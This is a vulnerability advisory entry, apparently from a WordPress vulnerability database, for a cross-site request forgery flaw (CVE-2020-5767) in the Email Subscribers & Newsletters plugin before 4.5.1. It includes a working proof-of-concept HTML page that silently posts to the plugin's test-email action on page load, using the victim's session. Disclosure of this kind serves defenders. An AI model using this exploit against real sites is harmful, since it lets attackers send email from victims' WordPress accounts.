Lucene search
WpvulndbWPEX-ID:E6F3170B-9589-4405-AFCF-F2756B1F496FHistoryJul 18, 2020 - 12:00 a.m.
Email Subscribers & Newsletters < 4.5.1 - Cross-site Request Forgery in send_test_email()
2020-07-1800:00:00
wpvulndb
7
0.001 Low
EPSS
Percentile
42.1%
An attacker could exploit this issue by convincing a user to click a specially crafted URL, which will send emails from the affected user’s WordPress email account.
<!DOCTYPE html>
<html>
<body onload=run()>
<script>
function run() {
var targetUrl = "http://example.com/webpage";
var email = "[email protected]";
var subject = "PoC";
var content = "add content here";
var xhttp = new XMLHttpRequest();
var data = "es_test_email=" + email + "&subject=" + subject +"&content=" + content + "&action=es_send_test_email";
var url = targetUrl + "/wp-admin/admin-ajax.php?";
var method = "POST";
xhttp.open(method, url);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = true;
xhttp.send(data); }
</script>
</body>
</html>
Related
prion
prion
Cross site request forgery (csrf)
2020-07-17 22:15:00
cve
cve
CVE-2020-5767
2020-07-17 22:15:11
patchstack
patchstack
cvelist
cvelist
CVE-2020-5767
2020-07-17 21:22:59
nvd
nvd
CVE-2020-5767
2020-07-17 22:15:11
wpvulndb
wpvulndb
nessus
nessus
WordPress Plugin 'Email Subscribers & Newsletters' Multiple Vulnerabilities
2020-08-27 00:00:00
openvas
openvas
WordPress Email Subscribers Plugin < 4.5.1 Multiple Vulnerabilities
2020-07-21 00:00:00